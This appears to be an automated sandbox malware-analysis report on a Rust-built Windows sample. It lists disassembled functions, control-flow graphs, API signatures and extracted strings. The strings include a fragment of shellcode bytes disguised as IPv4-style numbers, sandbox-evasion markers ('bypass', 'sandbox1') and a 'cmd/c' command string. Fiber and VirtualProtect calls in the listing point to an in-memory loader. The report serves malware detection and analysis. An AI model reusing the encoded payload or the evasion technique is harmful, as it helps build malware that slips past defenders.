                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: CryptCurrentProcessRandom
                                      • String ID:
                                      • API String ID: 2610850170-0
                                      • Opcode ID: f7dec293c5321023aafea9e39b34245bcf127b9f491b0d5b55acd89856d62f80
                                      • Instruction ID: a459fed09a78db4be9c334a00e390a41718f0a989e4c9041a0bff9918e5bba00
                                      • Opcode Fuzzy Hash: f7dec293c5321023aafea9e39b34245bcf127b9f491b0d5b55acd89856d62f80
                                      • Instruction Fuzzy Hash: C522D322A04A9189E7609F3ADC803ED7BA0FB0479CFC4423ADA5D67BD8DF78D5458320
                                      Function 00007FF7D4340E60 Relevance: 4.6, APIs: 3, Instructions: 84filenativesynchronizationCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: ErrorFileObjectSingleStatusWaitWrite
                                      • String ID:
                                      • API String ID: 3447438843-0
                                      • Opcode ID: 0c453017f7dbb31ba1ef3a11cfbce3ae70ece853cc87e92697933e530efc709c
                                      • Instruction ID: 1ef79aaf164ed2ca02d9061d0a95c2b681d789ae072c581bd7833e0629829295
                                      • Opcode Fuzzy Hash: 0c453017f7dbb31ba1ef3a11cfbce3ae70ece853cc87e92697933e530efc709c
                                      • Instruction Fuzzy Hash: 08315032618B8186EB20DF29F4803AEB3A5FB84390F908135E6DD57BA4DF3CD0848B10
                                      Function 00007FF7D4311224 Relevance: 17.9, APIs: 7, Strings: 3, Instructions: 381timesleepsynchronizationCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 670 7ff7d4311224-7ff7d4311263 call 7ff7d43110dc 673 7ff7d4311269-7ff7d431128a call 7ff7d4311c90 670->673 674 7ff7d431165c-7ff7d4311673 call 7ff7d435c005 670->674 679 7ff7d43116f8-7ff7d4311714 673->679 680 7ff7d4311290-7ff7d43112c5 call 7ff7d43110dc 673->680 682 7ff7d431167c-7ff7d4311693 call 7ff7d435c005 674->682 681 7ff7d4311732-7ff7d4311748 call 7ff7d435b460 679->681 680->682 689 7ff7d43112cb-7ff7d43112d4 680->689 687 7ff7d431174d-7ff7d431179f call 7ff7d435b200 681->687 696 7ff7d431169c-7ff7d43116dd call 7ff7d435b770 682->696 695 7ff7d43117a4 687->695 690 7ff7d43112ff-7ff7d4311302 689->690 691 7ff7d43112d6-7ff7d43112dc 689->691 694 7ff7d4311304-7ff7d431131e call 7ff7d4325000 call 7ff7d431c404 690->694 693 7ff7d43112df-7ff7d43112f0 691->693 693->693 697 7ff7d43112f2-7ff7d43112fd 693->697 715 7ff7d4311322-7ff7d4311326 694->715 699 7ff7d43117a6-7ff7d43117cd call 7ff7d435b580 695->699 706 7ff7d431145c-7ff7d4311479 696->706 697->694 708 7ff7d43117cf call 7ff7d431d820 699->708 709 7ff7d43117d4-7ff7d43117e3 699->709 710 7ff7d431147b 706->710 711 7ff7d43114b5-7ff7d43114bf 706->711 708->709 712 7ff7d4311482-7ff7d4311486 710->712 713 7ff7d43114c1-7ff7d43114ca 711->713 714 7ff7d43114d4-7ff7d43114e0 711->714 717 7ff7d431148c-7ff7d4311499 712->717 718 7ff7d43116f3 call 7ff7d435b720 712->718 713->699 719 7ff7d43114d0-7ff7d43114d2 713->719 720 7ff7d43116e2-7ff7d43116ee call 7ff7d435bc80 714->720 721 7ff7d43114e6-7ff7d43114ef 714->721 722 7ff7d4311328-7ff7d4311338 call 7ff7d43110ae 715->722 723 7ff7d431133a-7ff7d431136b call 7ff7d431c404 call 7ff7d4311c90 715->723 717->712 724 7ff7d431149b-7ff7d43114ae 717->724 718->679 726 7ff7d43114f0-7ff7d431152c call 7ff7d4312f70 719->726 720->718 721->726 722->715 741 7ff7d4311371-7ff7d43113af call 7ff7d4325220 call 7ff7d43110ae CreateWaitableTimerExW 723->741 742 7ff7d4311716-7ff7d431172b 723->742 724->711 737 7ff7d431156d-7ff7d4311576 726->737 738 7ff7d431152e-7ff7d4311531 726->738 739 7ff7d4311578-7ff7d4311596 737->739 740 7ff7d43115c2 737->740 743 7ff7d4311537-7ff7d4311568 call 7ff7d435b200 738->743 744 7ff7d43115c5-7ff7d43115cf 738->744 745 7ff7d4311598 739->745 746 7ff7d431159e-7ff7d43115ab 739->746 740->744 764 7ff7d43113b1-7ff7d43113db SetWaitableTimer 741->764 765 7ff7d4311404-7ff7d4311407 Sleep 741->765 742->681 743->695 748 7ff7d43115eb-7ff7d43115ee 744->748 749 7ff7d43115d1-7ff7d43115df 744->749 745->746 751 7ff7d43115ad-7ff7d43115b1 call 7ff7d4311ba0 746->751 752 7ff7d43115b6-7ff7d43115bd call 7ff7d4311ba0 746->752 748->687 755 7ff7d43115f4-7ff7d4311644 call 7ff7d4324ee0 call 7ff7d4325280 748->755 749->748 754 7ff7d43115e1-7ff7d43115e5 WakeByAddressSingle 749->754 751->752 752->740 754->748 766 7ff7d4311649-7ff7d431165b 755->766 767 7ff7d43113fb-7ff7d43113fe CloseHandle 764->767 768 7ff7d43113dd-7ff7d43113f7 WaitForSingleObject CloseHandle 764->768 769 7ff7d431140d-7ff7d431144b 765->769 767->765 768->769 770 7ff7d43113f9 768->770 769->706 771 7ff7d431144d-7ff7d4311456 769->771 770->765 771->696 771->706
                                      APIs
                                      Strings
                                      • called `Result::unwrap()` on an `Err` value, xrefs: 00007FF7D4311737
                                      • stdoutstd\src\io\mod.rsfailed to write whole buffer, xrefs: 00007FF7D431142F
                                      • crypt6252.72.131.228240.232.200.00.0.65.8165.80.82.8186.72.49.210101.72.139.8296.72.139.8224.72.139.8232.72.139.11480.72.15.18374.74.77.49201.72.49.192172.60.97.1242.44.32.65193.201.13.651.193.226.23782.65.81.72139.82.32.13966.60.72.1208.102, xrefs: 00007FF7D431161F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: CloseHandleSingleTimerWaitable$AddressCreateObjectSleepWaitWakememmove
                                      • String ID: called `Result::unwrap()` on an `Err` value$crypt6252.72.131.228240.232.200.00.0.65.8165.80.82.8186.72.49.210101.72.139.8296.72.139.8224.72.139.8232.72.139.11480.72.15.18374.74.77.49201.72.49.192172.60.97.1242.44.32.65193.201.13.651.193.226.23782.65.81.72139.82.32.13966.60.72.1208.102$stdoutstd\src\io\mod.rsfailed to write whole buffer
                                      • API String ID: 2369806718-460783922
                                      • Opcode ID: 5e50ec85a417946ee25cb143daf145ec4ac7be7fc589595a81bf30fe61645157
                                      • Instruction ID: dce89f007956670fb53854de8954fcf4849ece249fd3da9d5da064adb793ead6
                                      • Opcode Fuzzy Hash: 5e50ec85a417946ee25cb143daf145ec4ac7be7fc589595a81bf30fe61645157
                                      • Instruction Fuzzy Hash: D9026232A08B4695EB11AF1AE8813ECA374FB08798FD4413ADA9D67794DF3CD185C360
                                      Function 00007FF7D433C3D0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 204synchronizationCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 772 7ff7d433c3d0-7ff7d433c41c call 7ff7d43442f0 775 7ff7d433c422-7ff7d433c43d 772->775 776 7ff7d433c641-7ff7d433c645 772->776 777 7ff7d433c449-7ff7d433c467 775->777 778 7ff7d433c43f-7ff7d433c443 CloseHandle 775->778 779 7ff7d433c64c-7ff7d433c662 776->779 780 7ff7d433c469-7ff7d433c473 777->780 781 7ff7d433c4cd-7ff7d433c4d0 777->781 778->777 784 7ff7d433c479-7ff7d433c487 call 7ff7d4343870 780->784 785 7ff7d433c515-7ff7d433c53c call 7ff7d43435a0 780->785 782 7ff7d433c4d2-7ff7d433c4f9 call 7ff7d43435a0 781->782 783 7ff7d433c54f-7ff7d433c55f WaitForSingleObject 781->783 802 7ff7d433c4ff-7ff7d433c513 CloseHandle 782->802 803 7ff7d433c663-7ff7d433c693 call 7ff7d435c660 782->803 788 7ff7d433c561-7ff7d433c574 GetLastError 783->788 789 7ff7d433c5a6-7ff7d433c5bc GetExitCodeProcess 783->789 791 7ff7d433c48c-7ff7d433c496 784->791 804 7ff7d433c542-7ff7d433c549 CloseHandle 785->804 805 7ff7d433c695-7ff7d433c6c0 call 7ff7d435c660 785->805 795 7ff7d433c576-7ff7d433c580 call 7ff7d43272b0 788->795 796 7ff7d433c585-7ff7d433c590 788->796 789->788 792 7ff7d433c5be-7ff7d433c5f1 789->792 791->783 798 7ff7d433c49c-7ff7d433c4c8 call 7ff7d435c660 791->798 801 7ff7d433c5f5-7ff7d433c60c CloseHandle * 2 792->801 795->796 799 7ff7d433c592-7ff7d433c59c call 7ff7d43272b0 796->799 800 7ff7d433c5a1-7ff7d433c5a4 796->800 812 7ff7d433c6c5-7ff7d433c70a CloseHandle 798->812 799->800 800->801 809 7ff7d433c63e 801->809 810 7ff7d433c60e-7ff7d433c63c 801->810 802->783 803->812 804->783 805->812 809->776 810->779
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: CloseHandle$CodeErrorExitLastObjectProcessSingleWait
                                      • String ID: called `Result::unwrap()` on an `Err` value
                                      • API String ID: 17306042-2333694755
                                      • Opcode ID: f32aab344f718321276cfce7ff43fb377cd1a335c0314652abe8bc426d38f825
                                      • Instruction ID: 821e4447fdcf6e252e07753330c87685f9db52713b91d998c7f221516c0ae4da
                                      • Opcode Fuzzy Hash: f32aab344f718321276cfce7ff43fb377cd1a335c0314652abe8bc426d38f825
                                      • Instruction Fuzzy Hash: 19916C32A04B8699E721EF2AE8847ED7760FB44798F844136EE5C53B58DF38D185C750
                                      Function 00007FF7D4325000 Relevance: 12.3, APIs: 2, Strings: 6, Instructions: 347stringCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 815 7ff7d4325000-7ff7d4325020 816 7ff7d4325026-7ff7d432502c 815->816 817 7ff7d4325175-7ff7d4325186 815->817 816->817 818 7ff7d4325032-7ff7d4325039 816->818 819 7ff7d4325187-7ff7d432518c call 7ff7d4325460 818->819 820 7ff7d432503f-7ff7d4325065 call 7ff7d43272a0 818->820 825 7ff7d432518e-7ff7d43251dd call 7ff7d435c170 call 7ff7d43272b0 819->825 820->825 826 7ff7d432506b-7ff7d432507c 820->826 828 7ff7d432509b-7ff7d43250a2 826->828 830 7ff7d4325080-7ff7d4325082 828->830 831 7ff7d43250a4-7ff7d43250d0 strlen call 7ff7d4327a60 828->831 833 7ff7d4325085-7ff7d4325099 830->833 831->833 833->828 836 7ff7d43250d2-7ff7d43250fd 833->836 838 7ff7d432511b-7ff7d4325126 836->838 839 7ff7d4325128-7ff7d432512f 838->839 840 7ff7d4325110-7ff7d4325119 838->840 842 7ff7d43250ff call 7ff7d432ceb0 839->842 843 7ff7d4325131-7ff7d4325134 839->843 840->838 841 7ff7d4325149-7ff7d432515e call 7ff7d43272b0 840->841 841->817 854 7ff7d4325160-7ff7d432dcff call 7ff7d433c890 call 7ff7d4338570 841->854 848 7ff7d4325104 842->848 844 7ff7d4325142-7ff7d4325147 call 7ff7d432d4f0 843->844 845 7ff7d4325136-7ff7d4325139 843->845 844->840 845->840 849 7ff7d432513b-7ff7d4325140 call 7ff7d432d8c0 845->849 848->840 849->840 862 7ff7d432dd01-7ff7d432dd0d call 7ff7d432cb70 854->862 863 7ff7d432dd12-7ff7d432dd3d call 7ff7d433bcf0 854->863 868 7ff7d432dd92-7ff7d432dda5 call 7ff7d4337f90 862->868 869 7ff7d432dd3f-7ff7d432dd43 863->869 870 7ff7d432dd74-7ff7d432dd7e 863->870 879 7ff7d432ddab-7ff7d432de08 call 7ff7d433c230 call 7ff7d43385b0 868->879 880 7ff7d432df7f-7ff7d432dfb2 call 7ff7d435c660 868->880 869->870 871 7ff7d432dd45-7ff7d432dd6e 869->871 870->868 872 7ff7d432dd80-7ff7d432dd8d call 7ff7d43272b0 870->872 871->870 874 7ff7d432df64-7ff7d432df6e 871->874 872->868 877 7ff7d432df70-7ff7d432df7d 874->877 878 7ff7d432df55-7ff7d432df63 874->878 881 7ff7d432df50 call 7ff7d43272b0 877->881 892 7ff7d432dfb7-7ff7d432dfe9 call 7ff7d435c660 879->892 893 7ff7d432de0e-7ff7d432de5b call 7ff7d43440e0 memmove call 7ff7d4338590 879->893 888 7ff7d432e038-7ff7d432e05e 880->888 881->878 890 7ff7d432e079-7ff7d432e084 888->890 891 7ff7d432e060-7ff7d432e074 call 7ff7d43272b0 888->891 891->890 892->888 901 7ff7d432dfeb-7ff7d432e003 call 7ff7d435c330 893->901 902 7ff7d432de61-7ff7d432debc call 7ff7d43441d0 * 3 call 7ff7d433c330 893->902 901->888 912 7ff7d432dec1-7ff7d432dec8 902->912 913 7ff7d432dece-7ff7d432df23 call 7ff7d432d920 call 7ff7d432da60 912->913 914 7ff7d432e005-7ff7d432e033 call 7ff7d435c660 912->914 920 7ff7d432df37-7ff7d432df41 913->920 921 7ff7d432df25-7ff7d432df32 call 7ff7d43272b0 913->921 914->888 920->878 923 7ff7d432df43-7ff7d432df49 920->923 921->920 923->881
                                      APIs
                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,00000001,00000000,?,?,00000000,?,00007FF7D431130C), ref: 00007FF7D43250A7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: strlen
                                      • String ID: Failed to open file$called `Result::unwrap()` on an `Err` valuebypass\tools\src\lib.rscmd/ccalled `Option::unwrap()` on a `None` value$sandbox1$sandbox2$sandbox3$start
                                      • API String ID: 39653677-2961894791
                                      • Opcode ID: e1bb3d0855e3b08e5f0c4d74801302d93b06ec36227df3020df2ba6d60c9db2f
                                      • Instruction ID: 8fdce523410706ecc326b6dc90db3a84ce12363aec4661fcf44656867557433c
                                      • Opcode Fuzzy Hash: e1bb3d0855e3b08e5f0c4d74801302d93b06ec36227df3020df2ba6d60c9db2f
                                      • Instruction Fuzzy Hash: 9CE17562A05AC294FB61AF6AD8813ED7761FB44798FC4813BDE4C27695DF38D285C320
                                      Function 00007FF7D435A434 Relevance: 12.1, APIs: 8, Instructions: 94COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: __p___argc__p___argv__scrt_acquire_startup_lock__scrt_release_startup_lock_cexit_exit_get_initial_narrow_environment_register_thread_local_exe_atexit_callback
                                      • String ID:
                                      • API String ID: 1133592946-0
                                      • Opcode ID: c8766be1c68f80b00f9d8361ec58a8958c2ed24d493446e2ac115a53faac1bdf
                                      • Instruction ID: aabae253c4eec2be151aa1cd74d89e2916727061e67d4bdeeb042928590acbe9
                                      • Opcode Fuzzy Hash: c8766be1c68f80b00f9d8361ec58a8958c2ed24d493446e2ac115a53faac1bdf
                                      • Instruction Fuzzy Hash: 78314A61A0C18243FA14BF6FD4D53BDAB91AF45784FD4443EEA8E276D3CE2CA444A670
                                      Function 00007FF7D4343870 Relevance: 10.7, APIs: 7, Instructions: 180COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 975 7ff7d4343870-7ff7d43438b5 call 7ff7d4343bf0 978 7ff7d43438ca-7ff7d43438fe call 7ff7d4343bf0 975->978 979 7ff7d43438b7-7ff7d43438c5 CloseHandle 975->979 983 7ff7d4343909-7ff7d4343957 978->983 984 7ff7d4343900-7ff7d4343904 978->984 980 7ff7d4343ae0-7ff7d4343af6 979->980 986 7ff7d4343960-7ff7d4343977 WaitForMultipleObjects 983->986 985 7ff7d4343ad3-7ff7d4343adb call 7ff7d43329b0 984->985 985->980 988 7ff7d4343979-7ff7d434397b 986->988 989 7ff7d43439c0-7ff7d43439c7 986->989 992 7ff7d4343a7c-7ff7d4343a8c GetLastError 988->992 993 7ff7d4343981-7ff7d4343988 988->993 990 7ff7d43439cd-7ff7d43439d0 989->990 991 7ff7d4343a50-7ff7d4343a56 call 7ff7d4343d10 989->991 997 7ff7d4343a37 990->997 998 7ff7d43439d2-7ff7d43439ef GetOverlappedResult 990->998 1002 7ff7d4343a5b-7ff7d4343a5f 991->1002 999 7ff7d4343aca-7ff7d4343ace call 7ff7d43329b0 992->999 994 7ff7d4343a17-7ff7d4343a1d call 7ff7d4343d10 993->994 995 7ff7d434398e-7ff7d4343991 993->995 1016 7ff7d4343a22-7ff7d4343a26 994->1016 1000 7ff7d43439fa 995->1000 1001 7ff7d4343993-7ff7d43439b0 GetOverlappedResult 995->1001 1007 7ff7d4343a3b-7ff7d4343a4e 997->1007 1004 7ff7d4343af7-7ff7d4343b0f GetLastError 998->1004 1005 7ff7d43439f5-7ff7d43439f8 998->1005 999->985 1015 7ff7d43439fe-7ff7d4343a11 1000->1015 1009 7ff7d4343a8e-7ff7d4343aa6 GetLastError 1001->1009 1010 7ff7d43439b6-7ff7d43439b9 1001->1010 1011 7ff7d4343a61-7ff7d4343a65 1002->1011 1012 7ff7d4343a76-7ff7d4343a7a 1002->1012 1013 7ff7d4343b11-7ff7d4343b14 1004->1013 1014 7ff7d4343b16-7ff7d4343b27 call 7ff7d4332840 1004->1014 1005->1007 1007->991 1008 7ff7d4343a6b-7ff7d4343a74 call 7ff7d4343e80 1007->1008 1028 7ff7d4343ac7 1008->1028 1020 7ff7d4343aa8-7ff7d4343aab 1009->1020 1021 7ff7d4343aad-7ff7d4343ab6 call 7ff7d4332840 1009->1021 1010->1015 1011->986 1011->1008 1012->999 1013->999 1013->1014 1014->1008 1015->994 1019 7ff7d4343abe-7ff7d4343ac2 call 7ff7d4343e80 1015->1019 1016->1012 1022 7ff7d4343a28-7ff7d4343a2c 1016->1022 1019->1028 1020->999 1020->1021 1021->1019 1022->986 1026 7ff7d4343a32 1022->1026 1026->1019 1028->999
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: CloseCreateErrorEventHandleLast
                                      • String ID:
                                      • API String ID: 937152468-0
                                      • Opcode ID: 9afe5e846bde485cb8bb49b880daa7dd6efead5c1ac7238222e04662c7bb6096
                                      • Instruction ID: f0e8f406e6b9901d04d5851da61d58f01f80fd4144c87265a1b7dc7a9304d1f1
                                      • Opcode Fuzzy Hash: 9afe5e846bde485cb8bb49b880daa7dd6efead5c1ac7238222e04662c7bb6096
                                      • Instruction Fuzzy Hash: 09818422F08A5589FB14AF6ADC803FC6760FB04798F90053ADE1D67B99DF38D5958360
                                      Function 00007FF7D432EFD0 Relevance: 10.5, APIs: 7, Instructions: 42memorythreadCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: Fiber$SwitchVirtual$AllocConvertCreateProtectThreadmemmove
                                      • String ID:
                                      • API String ID: 2990300613-0
                                      • Opcode ID: 631ac8cff794fe8eb457b7d7e8aceb2a3c69c13bb6798a98e485168742f228b2
                                      • Instruction ID: f034612f4521d410f505609a434712fd40ba7cd669800585dbd09c688f135372
                                      • Opcode Fuzzy Hash: 631ac8cff794fe8eb457b7d7e8aceb2a3c69c13bb6798a98e485168742f228b2
                                      • Instruction Fuzzy Hash: D7F0AF6170915142EA18BF6BAE59B6ECA916F4DFD1FC0803ADD0E67F94CD3CC1464710
                                      Function 00007FF7D4340700 Relevance: 9.2, APIs: 6, Instructions: 172fileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1031 7ff7d4340700-7ff7d434072c call 7ff7d434aa50 1034 7ff7d434072e-7ff7d4340766 call 7ff7d4342190 1031->1034 1035 7ff7d4340781-7ff7d4340786 1031->1035 1039 7ff7d4340768-7ff7d4340774 1034->1039 1040 7ff7d434078b-7ff7d434078e 1034->1040 1037 7ff7d4340916-7ff7d4340928 1035->1037 1041 7ff7d4340776-7ff7d4340778 1039->1041 1042 7ff7d4340793-7ff7d4340795 1039->1042 1040->1037 1043 7ff7d4340797-7ff7d43407a1 1041->1043 1045 7ff7d434077a-7ff7d434077f 1041->1045 1042->1043 1044 7ff7d43407bf-7ff7d43407c4 1042->1044 1046 7ff7d43407d6-7ff7d43407db 1043->1046 1047 7ff7d43407a3-7ff7d43407a5 1043->1047 1048 7ff7d43407a7-7ff7d43407b4 1044->1048 1049 7ff7d43407c6-7ff7d43407cb 1044->1049 1045->1046 1053 7ff7d43407ee-7ff7d43407f0 1046->1053 1054 7ff7d43407dd-7ff7d43407df 1046->1054 1047->1046 1047->1048 1050 7ff7d43407ba 1048->1050 1051 7ff7d4340902-7ff7d4340911 call 7ff7d43272b0 1048->1051 1049->1048 1052 7ff7d43407cd-7ff7d43407d2 1049->1052 1050->1037 1051->1037 1052->1048 1056 7ff7d43407d4 1052->1056 1057 7ff7d43407f2-7ff7d43407fb 1053->1057 1059 7ff7d4340803-7ff7d4340814 1053->1059 1054->1057 1058 7ff7d43407e1-7ff7d43407ea 1054->1058 1056->1046 1060 7ff7d43407fd-7ff7d4340801 1057->1060 1061 7ff7d4340816-7ff7d434081b 1057->1061 1058->1060 1062 7ff7d43407ec 1058->1062 1059->1060 1059->1061 1065 7ff7d4340857-7ff7d434089a CreateFileW 1060->1065 1063 7ff7d434081d-7ff7d4340839 1061->1063 1064 7ff7d434083b-7ff7d434083d 1061->1064 1062->1061 1063->1065 1066 7ff7d434084a-7ff7d434084c 1064->1066 1067 7ff7d434083f-7ff7d4340841 1064->1067 1068 7ff7d43408e7-7ff7d4340900 GetLastError 1065->1068 1069 7ff7d434089c-7ff7d43408a2 1065->1069 1066->1048 1070 7ff7d4340852 1066->1070 1067->1070 1071 7ff7d4340843-7ff7d4340848 1067->1071 1068->1037 1068->1051 1072 7ff7d43408de-7ff7d43408e3 1069->1072 1073 7ff7d43408a4-7ff7d43408a9 1069->1073 1070->1065 1071->1065 1072->1051 1075 7ff7d43408e5 1072->1075 1073->1072 1074 7ff7d43408ab-7ff7d43408b6 GetLastError 1073->1074 1074->1072 1076 7ff7d43408b8-7ff7d43408dc SetFileInformationByHandle 1074->1076 1075->1037 1076->1072 1077 7ff7d4340929-7ff7d4340946 GetLastError CloseHandle 1076->1077 1078 7ff7d4340948-7ff7d4340957 call 7ff7d43272b0 1077->1078 1079 7ff7d434095c-7ff7d434095f 1077->1079 1078->1079 1079->1037
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: ErrorLast$FileHandle$CloseCreateInformation
                                      • String ID:
                                      • API String ID: 1617036312-0
                                      • Opcode ID: ce14058a8acbd09b3979ace38569a44abc07a0a54747e84948ad0dd79d44fb84
                                      • Instruction ID: ba92f5d10c4fd0cd96eef23c5e0db7ed33c26e41ab1156d34e94540bbf72ac85
                                      • Opcode Fuzzy Hash: ce14058a8acbd09b3979ace38569a44abc07a0a54747e84948ad0dd79d44fb84
                                      • Instruction Fuzzy Hash: 4861EA21B0C24542F671AF16D984BBEAAB0AF457A0FC4013ADE9D276D4DE3DD844CB61
                                      Function 00007FF7D43118B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 131threadCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: Thread$CurrentDescriptionExceptionGuaranteeHandlerStackVectored
                                      • String ID: main
                                      • API String ID: 3663057573-3207122276
